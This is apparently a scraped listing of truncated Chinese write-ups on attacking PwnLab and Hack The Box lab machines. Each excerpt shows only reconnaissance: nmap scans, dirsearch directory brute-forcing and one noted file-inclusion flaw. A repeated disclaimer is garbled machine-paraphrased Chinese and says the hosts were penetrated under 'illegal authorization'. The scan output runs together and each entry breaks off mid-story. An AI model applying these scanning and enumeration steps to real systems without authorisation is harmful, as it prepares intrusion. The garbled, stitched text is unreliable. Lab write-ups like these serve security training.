Speaks41ProtocolNew, LongPassword, FoundRows, SupportsTransactions, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults| Status: Autocommit| Salt: mT<l1J`%6|5-#fZn=&BZ|_ Auth Plugin Name: mysql_native_password53955/tcp open status 1 (RPC #100024)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsTRACEROUTE (using port 443/tcp)HOP RTT ADDRESS1 227.38 ms 192.168.49.12 227.59 ms 192.168.151.29OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 39.73 secondsweb┌──(rootkali)-[~/pg/PwnLab]└─# python3 /root/dirsearch/dirsearch.py -e* -u http://192.168.151.29 -t 30 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492Output File: /root/dirsearch/reports/192.168.151.29/_22-01-17_07-55-55.txtError Log: /root/dirsearch/logs/errors-22-01-17_07-55-55.logTarget: http://192.168.151.29/[07:55:55] Starting: [07:57:33] 200 - 0B - /config.php [07:57:59] 200 - 943B - /images/ [07:57:59] 301 - 317B - /images -> http://192.168.151.29/images/ [07:58:02] 200 - 332B - /index.php/login/ [07:58:02] 200 - 332B - /index.php [07:58:09] 200 - 250B - /login.php [07:58:59] 301 - 317B - /upload -> http://192.168.151.29/upload/ [07:59:00] 200 - 19B - /upload.php [07:59:00] 200 - 743B - /upload/ 跑出4个php文件，config.php,index.php,upload.php,login.php ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测rootkali)-[~/htb/Bastard]└─# nmap -sV -Pn -A -O 10.10.10.9 -p- Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-09 22:49 ESTNmap scan report for 10.10.10.9Host is up (0.31s latency).Not shown: 65532 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open tcpwrapped| http-robots.txt: 36 disallowed entries (15 shown)| /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt|_http-title: Welcome to 10.10.10.9 | 10.10.10.9|_http-generator: Drupal 7 (http://drupal.org)|_http-server-header: Microsoft-IIS/7.5135/tcp open msrpc?49154/tcp open tcpwrappedWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: specialized|general purpose|phoneRunning (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (89%)OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (89%), Microsoft Windows 8.1 Update 1 (89%), Microsoft Windows Phone 7.5 or 8.0 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 (88%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 R2 or Windows 8.1 (88%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (88%), Microsoft Windows 7 (88%), Microsoft Windows 7 Professional or Windows 8 (88%)No exact OS matches for host (test conditions non-ideal).Network Distance: 3 hopsTRACEROUTE (using port 135/tcp)HOP RTT ADDRESS1 310.73 ms 10.10.14.12 ...3 309.08 ms 10.10.10.9OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2442.65 secondsweb目录爆破 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测端口发现 ┌──(rootkali)-[~/htb/Sauna]└─# nmap -p- -Pn 10.10.10.175 --openHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:23 ESTNmap scan report for 10.10.10.175Host is up (0.26s latency).Not shown: 65515 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl5985/tcp open wsman9389/tcp open adws49667/tcp open unknown49673/tcp open unknown49674/tcp open unknown49677/tcp open unknown49689/tcp open unknown49697/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 1192.54 seconds具体端口信息 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测查看开启端口 ┌──(rootkali)-[~/htb/Tabby]└─# nmap -p- 10.10.10.194 --open Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:22 ESTNmap scan report for 10.10.10.194Host is up (0.25s latency).Not shown: 64733 closed ports, 799 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh80/tcp open http8080/tcp open http-proxyNmap done: 1 IP address (1 host up) scanned in 249.82 seconds端口详细信息 ┌──(rootkali)-[~/htb/Tabby]└─# nmap -sV -T4 -A -O 10.10.10.194 -p 22,80,8080 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:33 ESTNmap scan report for 10.10.10.194Host is up (0.29s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: Mega Hosting8080/tcp open http Apache Tomcat|_http-open-proxy: Proxy might be redirecting requests|_http-title: Apache TomcatWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 8080/tcp)HOP RTT ADDRESS1 292.67 ms 10.10.14.12 293.43 ms 10.10.10.194OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 26.08 seconds有两个http服务,80是apache，8080是tomcat ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测探测凋谢端口 ┌──(rootkali)-[~/htb/Poison]└─# nmap -p- 10.10.10.84 --open Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 21:11 ESTNmap scan report for 10.10.10.84Host is up (0.30s latency).Not shown: 37616 filtered ports, 27917 closed portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 161.63 seconds端口服务详细信息 ┌──(rootkali)-[~/htb/Poison]└─# nmap -sV -T4 -A -O 10.10.10.84 -p 22,80Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 21:15 ESTNmap scan report for 10.10.10.84Host is up (0.27s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)| ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32|_http-title: Site doesn't have a title (text/html; charset=UTF-8).Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.1-STABLE (97%), FreeBSD 11.1-RELEASE or 11.2-STABLE (95%), FreeBSD 11.2-RELEASE - 11.3 RELEASE or 11.2-STABLE (95%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.3-RELEASE (95%), FreeBSD 11.1-RELEASE (94%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (94%), FreeBSD 12.0-RELEASE - 13.0-CURRENT (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsdTRACEROUTE (using port 22/tcp)HOP RTT ADDRESS1 290.93 ms 10.10.14.12 290.23 ms 10.10.10.84OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 25.96 secondswebhttp服务有一个文件蕴含破绽，输出文件的名字会蕴含这个文件，比方http://10.10.10.84/browse.php?file=phpinfo.php ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责服务探测查看开启端口服务 ┌──(rootkali)-[~/htb/Active]└─# nmap -p- 10.10.10.100 --openStarting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 04:33 ESTNmap scan report for 10.10.10.100Host is up (0.30s latency).Not shown: 65508 closed ports, 4 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE53/tcp open domain88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl5722/tcp open msdfsr9389/tcp open adws47001/tcp open winrm49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49157/tcp open unknown49158/tcp open unknown49169/tcp open unknown49171/tcp open unknown49180/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 136.09 seconds查看对应端口详细信息 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测查看凋谢端口 ┌──(rootkali)-[~/htb/Nest]└─# nmap -p- 10.10.10.178 --open Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:26 ESTNmap scan report for 10.10.10.178Host is up (0.26s latency).Not shown: 65533 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE445/tcp open microsoft-ds4386/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 645.94 seconds查看端口信息 (rootkali)-[~/htb/Nest]└─# nmap -sV -T4 -A -O -p 445,4386 10.10.10.178Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:38 ESTNmap scan report for 10.10.10.178Host is up (0.30s latency).PORT STATE SERVICE VERSION445/tcp open microsoft-ds?4386/tcp open unknown| fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2| Unrecognised command| Help: | Reporting Service V1.2| This service allows users to run queries against databases using the legacy HQK format| AVAILABLE COMMANDS ---| LIST| SETDIR <Directory_Name>| RUNQUERY <Query_ID>| DEBUG <Password>|_ HELP <Command>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port4386-TCP:V=7.91%I=7%D=12/28%Time=61CB216C%P=x86_64-pc-linux-gnu%r(NSF:ULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLiSF:nes,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognisSF:ed\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\xSF:20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\rSF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20commSF:and\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\rSF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20RepSF:orting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQSF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQKSF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allowsSF:\x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20tSF:he\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20--SF:-\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\rSF:\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCookSF:ie,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionSF:Req,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,SF:21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\rSF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3SF:A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x2SF:0command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.SF:2\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\SF:.2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.SF:2\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\SF:r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\xSF:20Reporting\x20Service\x20V1\.2\r\n\r\n>");Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purpose|phone|specializedRunning (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsHost script results:| smb2-security-mode: | 2.02: |_ Message signing enabled but not required| smb2-time: | date: 2021-12-28T14:41:29|_ start_date: 2021-12-28T14:24:52TRACEROUTE (using port 4386/tcp)HOP RTT ADDRESS1 307.68 ms 10.10.14.12 307.76 ms 10.10.10.178OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 220.72 seconds只开启了samba和一个未知的服务，先从samba开始 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测查看开明端口 ┌──(rootkali)-[~/htb/Postman]└─# nmap -p- 10.10.10.160 --openStarting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:54 ESTNmap scan report for 10.10.10.160Host is up (0.31s latency).Not shown: 64665 closed ports, 866 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh80/tcp open http6379/tcp open redis10000/tcp open snet-sensor-mgmtNmap done: 1 IP address (1 host up) scanned in 107.39 seconds查看端口详细信息 ┌──(rootkali)-[~/htb/Postman]└─# nmap -sV -T4 -A -O 10.10.10.160 -p 22,80,6379,10000Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:57 ESTNmap scan report for 10.10.10.160Host is up (0.26s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: The Cyber Geek's Personal Website6379/tcp open redis Redis key-value store 4.0.910000/tcp open http MiniServ 1.910 (Webmin httpd)|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 443/tcp)HOP RTT ADDRESS1 251.42 ms 10.10.14.12 253.03 ms 10.10.10.160OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 52.24 seconds先把靶机域名写进host文件 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测查看开启端口 ┌──(rootkali)-[~/htb/OpenAdmin]└─# nmap -p- 10.10.10.171 --open Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 07:25 ESTNmap scan report for 10.10.10.171Host is up (0.44s latency).Not shown: 52367 closed ports, 13166 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 190.21 seconds查看指定端口详细信息 (rootkali)-[~/htb/OpenAdmin]└─# nmap -sV -T4 -sC -A -O 10.10.10.171 -p 22,80Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 07:29 ESTNmap scan report for 10.10.10.171Host is up (0.37s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-title: Apache2 Ubuntu Default Page: It worksWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.1 (98%), Linux 3.2 (98%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (98%), Linux 3.16 (97%), ASUS RT-N56U WAP (Linux 3.4) (96%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%), Linux 2.6.16 (94%), Asus RT-AC66U router (Linux 2.6) (91%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT ADDRESS1 432.42 ms 10.10.14.12 440.73 ms 10.10.10.171OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 74.54 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.171 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.171/_21-12-23_07-30-54.txtError Log: /root/dirsearch/logs/errors-21-12-23_07-30-54.logTarget: http://10.10.10.171/[07:31:03] Starting: [07:33:49] 200 - 11KB - /index.html [07:34:05] 301 - 312B - /music -> http://10.10.10.171/music/ [07:34:08] 301 - 310B - /ona -> http://10.10.10.171/ona/ /ona/文件夹是一个叫openNetAdmin的cms，版本号是18.1.1 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现先疾速看看哪些端口开着 ┌──(rootkali)-[~/htb/Bastion]└─# nmap -p- 10.10.10.134 --open Nmap scan report for 10.10.10.134Host is up (0.50s latency).Not shown: 63143 closed ports, 2379 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds5985/tcp open wsman47001/tcp open winrm49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49670/tcp open unknown再具体查看指定端口信息 └─# nmap -Pn -sV 10.10.10.134 -A -O -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 09:04 ESTNmap scan report for 10.10.10.134Host is up (0.58s latency).PORT STATE SERVICE VERSION22/tcp open tcpwrapped| ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)135/tcp open msrpc Microsoft Windows RPC139/tcp filtered netbios-ssn445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49670/tcp open unknownWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: -19m59s, deviation: 34m33s, median: -3s| smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)| NetBIOS computer name: BASTION\x00| Workgroup: WORKGROUP\x00|_ System time: 2021-12-22T15:06:21+01:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: | 2.02: |_ Message signing enabled but not required| smb2-time: | date: 2021-12-22T14:06:17|_ start_date: 2021-12-22T13:37:56TRACEROUTE (using port 135/tcp)HOP RTT ADDRESS1 566.46 ms 10.10.14.12 565.05 ms 10.10.10.134OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 181.76 secondssmbmap看到nmap扫描出smb有一个用户guest，用smbmap查看分享目录信息 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现先查看靶机都凋谢了哪些端口 ┌──(rootkali)-[~]└─# nmap 10.10.10.117 --open -p-Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 03:47 ESTStats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 4.25% done; ETC: 03:52 (0:04:30 remaining)Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 4.68% done; ETC: 03:52 (0:04:25 remaining)Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 5.19% done; ETC: 03:52 (0:04:16 remaining)Nmap scan report for 10.10.10.117Host is up (0.31s latency).Not shown: 65492 closed ports, 36 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind6697/tcp open ircs-u8067/tcp open infi-async38540/tcp open unknown65534/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 113.95 seconds再获取这些端口的详细信息 ...

